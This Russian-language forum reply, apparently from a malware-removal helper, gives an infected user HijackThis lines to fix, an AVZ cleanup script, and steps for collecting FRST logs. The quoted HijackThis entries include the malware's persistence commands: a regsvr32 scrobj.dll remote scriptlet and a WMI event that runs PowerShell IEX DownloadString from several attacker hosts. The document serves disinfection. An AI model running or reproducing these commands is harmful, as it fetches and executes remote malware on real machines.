Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:
Код:
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2020/04/04) - {77129b55-3600-4649-992d-6a023a559297} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/04/04) - {77129b55-3600-4649-992d-6a023a559297} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/04/04) - {77129b55-3600-4649-992d-6a023a559297} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/04/04) - {77129b55-3600-4649-992d-6a023a559297} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/04/04) - {77129b55-3600-4649-992d-6a023a559297} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O8 - Context menu item: HKU\S-1-5-19\..\Internet Explorer\MenuExt\Add to Google Photos Screensa&ver: (default) = C:\Windows\system32\GPhotos.scr (file missing)
O8 - Context menu item: HKU\S-1-5-20\..\Internet Explorer\MenuExt\Add to Google Photos Screensa&ver: (default) = C:\Windows\system32\GPhotos.scr (file missing)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: avast - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00avast: avast - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
Выполните скрипт в AVZ:
Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
QuarantineFile('a.exe', '');
QuarantineFile('C:\Users\User\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\User\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('c:\windows\debug\item.dat>', '');
QuarantineFile('c:\windows\debug\item.dat', '');
QuarantineFile('c:\windows\debug\ok.dat', '');
QuarantineFile('c:\windows\help\lsmosee.exe>', '');
QuarantineFile('C:\Windows\inf\aspnet\lsma12.exe', '');
QuarantineFile('http:\amtomil.ru\f.exe', '');
DeleteFile('a.exe', '64');
DeleteFile('C:\Users\User\AppData\Roaming\curl\curl.exe', '64');
DeleteFile('C:\Users\User\AppData\Roaming\curl\curl_7_54.exe', '64');
DeleteFile('c:\windows\debug\item.dat>', '64');
DeleteFile('c:\windows\debug\item.dat', '64');
DeleteFile('c:\windows\debug\ok.dat', '64');
DeleteFile('c:\windows\help\lsmosee.exe>', '64');
DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', '');
DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '64');
DeleteFile('http:\amtomil.ru\f.exe', '64');
DeleteService('aow_drv');
DeleteService('aswFsBlk');
DeleteService('aswMonFlt');
DeleteService('aswRdr');
DeleteService('aswSnx');
DeleteService('aswSP');
DeleteService('aswTdi');
DeleteService('FairplayKD');
DeleteService('npggsvc');
DeleteService('QMEmulatorService');
DeleteService('UbarCalloutDriver');
DeleteFileMask('c:\users\user\appdata\roaming\curl', '*', true);
DeleteFileMask('C:\Windows\system32', 'Tmp*.tmp', true);
DeleteDirectory('c:\users\user\appdata\roaming\curl');
DelCLSID('{104AA62D-D285-4BF9-87ED-CC68F20CDD0F}');
DelCLSID('{8A69D345-D564-463c-AFF1-A69D9E530F96}');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk', 'x64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Zaxar Games Browser.lnk', 'x64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\amigo', 'x64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DiscordPTB', 'x64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GameCenterMailRu', 'x64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MediaGet2', 'x64');
RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\OneClick', 'x64');
DeleteSchedulerTask('{91EF6959-070C-46EA-A74E-37699DCFE30E}');
DeleteSchedulerTask('curl');
DeleteSchedulerTask('curls');
DeleteSchedulerTask('Mysa');
DeleteSchedulerTask('Mysa1');
DeleteSchedulerTask('Mysa2');
DeleteSchedulerTask('Mysa3');
DeleteSchedulerTask('ok');
DeleteSchedulerTask('oka');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 3, 3, true);
RebootWindows(true);
end.
Компьютер перезагрузится.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Перетащите лог Check_Browsers_LNK.log из папки Autologger на утилиту ClearLNK. Отчёт о работе прикрепите.
Пролечите систему с помощью KVRT, затем сделайте такой лог.
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).